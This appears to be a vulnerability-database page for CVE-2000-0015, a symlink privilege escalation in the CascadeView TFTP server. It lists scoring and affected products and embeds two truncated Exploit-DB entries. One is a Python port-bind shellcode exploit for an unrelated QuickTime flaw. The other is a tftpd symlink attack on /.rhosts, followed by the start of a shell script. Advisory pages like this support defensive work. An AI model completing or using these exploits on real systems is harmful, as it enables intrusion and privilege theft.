CVE-2000-0015
published 1999-12-31CVE-2000-0015: CascadeView TFTP server allows local users to gain privileges via a symlink attack.
PriorityP416medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
0.57%
43.0th percentile
CascadeView TFTP server allows local users to gain privileges via a symlink attack.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ascend | cascadeview_ux | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
exploitdb·2007-01-03
CVE-2007-0015 Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
---
#!/usr/bin/python
#Port bind exploit for apple quicktime rtsp vulnerability
#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy
#to port the exploit to others. All one needs to do is look for the appropriate
#jump address. Certain characters are not permitted in the shellcode.
#Alphanumeric shellcodes work fine.
#This script creates a qtl file which when clicked upon binds a shell to TCP
#port 4444. This file can be delivered through several means; HTTP, SMTP etc
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any kind of screws up caused by using
# this code
import sys
#alpha numeric port bind shellcode from metasploit; binds shell to port 4444
shellcode = "\xeb\x03\x
Exploit-DB
Ascend CascadeView/UX 1.0 tftpd - Symbolic Link
exploitdb·1999-12-31
CVE-2000-0015 Ascend CascadeView/UX 1.0 tftpd - Symbolic Link
Ascend CascadeView/UX 1.0 tftpd - Symbolic Link
---
source: https://www.securityfocus.com/bid/910/info
The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 network devices creates a log in /tmp called tftpd_xfer_status.log. If /tmp/tftpd_xfer_status.log already exists as a symbolic link, tftpd will follow it and overwrite any data it points to (it runs as root). It is possible for an attacker to link the log file to a file like /.rhosts to compromise elevated privileges on the device. It should be made clear that since this is a network device vulnerability, the consequences of compromise could be much greater to the network the device is on as a whole than if it were a single regular host.
#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with Ca
No writeups or analysis indexed.
1999-12-31
Published